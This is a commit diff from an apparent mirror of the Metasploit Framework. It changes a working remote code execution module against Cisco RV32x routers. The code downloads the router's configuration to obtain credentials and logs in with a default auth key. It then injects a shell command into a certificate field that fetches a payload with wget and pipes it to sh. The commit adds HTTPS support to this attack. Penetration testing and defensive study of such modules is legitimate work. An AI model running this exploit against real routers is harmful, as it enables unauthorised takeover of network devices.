infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Checked the functionality of module. Added ability to connect via HTTPS.

master
blightzero 2019-03-14 15:54:02 +01:00
parent 0551f3df3c
commit 1e00c28701
1 changed files with 38 additions and 28 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

66
modules/exploits/linux/http/cisco_rv32x_rce.rb
View File

@ -58,8 +58,10 @@ class MetasploitModule < Msf::Exploit::Remote
register_options([ register_options([
Opt::RPORT(8007), # port of Cisco webinterface Opt::RPORT(8007), # port of Cisco webinterface
OptString.new('URIPATH', [true, 'The path for the stager. Keep set to default! (We are limited to 50 chars for the initial command.)', '/']), OptString.new('URIPATH', [true, 'The path for the stager. Keep set to default! (We are limited to 50 chars for the initial command.)', '/']),
OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 15]) OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 15]),
OptBool.new('USE_SSL', [false, 'Negotiate SSL/TLS for outgoing connections', false]) # Don't use 'SSL' option to prevent HttpServer from picking this up.
]) ])
deregister_options('SSL') # prevent SSL in HttpServer and resulting payload requests since the injected wget command will not work with '--no-check-certificate' option.
end end
def execute_command(cmd, opts = {}) def execute_command(cmd, opts = {})
@ -79,13 +81,19 @@ class MetasploitModule < Msf::Exploit::Remote
def primer def primer
payload_url = get_uri payload_url = get_uri
print_status("Downloading configuration from #{peer}") print_status("Downloading configuration from #{peer}")
res = send_request_cgi({'uri'=>normalize_uri("cgi-bin","config.exp")}) if(datastore['USE_SSL'])
print_status("Using SSL connection to router.")
end
res = send_request_cgi({
'uri' => normalize_uri("cgi-bin","config.exp"),
'SSL' => datastore['USE_SSL']
})
unless res unless res
vprint_error('Connection failed.') vprint_error('Connection failed.')
return nil return nil
end end
unless res.status == 200 unless res.code == 200
vprint_error('Could not download config. Aborting.') vprint_error('Could not download config. Aborting.')
return nil return nil
end end
@ -99,6 +107,7 @@ class MetasploitModule < Msf::Exploit::Remote
print_status("Using default auth_key #{authkey}") print_status("Using default auth_key #{authkey}")
res2 = send_request_cgi({ res2 = send_request_cgi({
'uri' => normalize_uri("cgi-bin","userLogin.cgi"), 'uri' => normalize_uri("cgi-bin","userLogin.cgi"),
'SSL' => datastore['USE_SSL'],
'method' => 'POST', 'method' => 'POST',
'data' => "login=true&portalname=CommonPortal&password_expired=0&auth_key=#{authkey}&auth_server_pw=Y2lzY28%3D&submitStatus=0&pdStrength=1&username=#{username}&password=#{pass}&LanguageList=Deutsch&current_password=&new_password=&re_new_password=" 'data' => "login=true&portalname=CommonPortal&password_expired=0&auth_key=#{authkey}&auth_server_pw=Y2lzY28%3D&submitStatus=0&pdStrength=1&username=#{username}&password=#{pass}&LanguageList=Deutsch&current_password=&new_password=&re_new_password="
}) })
@ -108,7 +117,7 @@ class MetasploitModule < Msf::Exploit::Remote
return nil return nil
end end
unless res.status == 200 unless res.code == 200
vprint_error('Login failed with downloaded credentials. Aborting.') vprint_error('Login failed with downloaded credentials. Aborting.')
return nil return nil
end end
@ -120,7 +129,7 @@ class MetasploitModule < Msf::Exploit::Remote
print_status("Sending payload. Staging via #{payload_url}.") print_status("Sending payload. Staging via #{payload_url}.")
#Build staging command #Build staging command
command_string = CGI::escape("'$(wget -q -O- #{payload_url}|sh)'") command_string = CGI::escape("'$(wget -q -O- #{payload_url}|sh)'")
if(command_string.length <= 50) if(command_string.length <= 63)
print_status("Staging command length looks good. Sending exploit!") print_status("Staging command length looks good. Sending exploit!")
else else
vprint_error("Warning: Staging command length probably too long. Trying anyway...") vprint_error("Warning: Staging command length probably too long. Trying anyway...")
@ -128,31 +137,32 @@ class MetasploitModule < Msf::Exploit::Remote
res3 = send_request_cgi({ res3 = send_request_cgi({
'uri' => normalize_uri("certificate_handle2.htm"), 'uri' => normalize_uri("certificate_handle2.htm"),
'SSL' => datastore['USE_SSL'],
'method' => 'POST', 'method' => 'POST',
'cookie' => cookies, 'cookie' => cookies,
'vars_get' => { 'vars_get' => {
'type' => '4', 'type' => '4',
}, },
'vars_post' => { 'vars_post' => {
'page' => 'self_generator.htm', 'page' => 'self_generator.htm',
'totalRules' => '1', 'totalRules' => '1',
'OpenVPNRules' => '30', 'OpenVPNRules' => '30',
'submitStatus' => '1', 'submitStatus' => '1',
'log_ch' => '1', 'log_ch' => '1',
'type' => '4', 'type' => '4',
'Country' => 'US', 'Country' => 'A',
'state' => 'CA', 'state' => 'A',
'locality' => 'DC', 'locality' => 'A',
'organization' => 'cc', 'organization' => 'A',
'organization_unit' => 'A', 'organization_unit' => 'A',
'email' => 'any@example.com', 'email' => 'any@example.com',
'KeySize' => '512', 'KeySize' => '512',
'KeyLength' => '1024', 'KeyLength' => '1024',
'valid_days' => '30', 'valid_days' => '30',
'SelectSubject_c' => '1', 'SelectSubject_c' => '1',
'SelectSubject_s' => '1' 'SelectSubject_s' => '1'
}, },
'data' => "common_name=#{command_string}" 'data' => "common_name=#{command_string}"
}) })
unless res3 unless res3
vprint_error('Connection failed while sending command. Aborting.') vprint_error('Connection failed while sending command. Aborting.')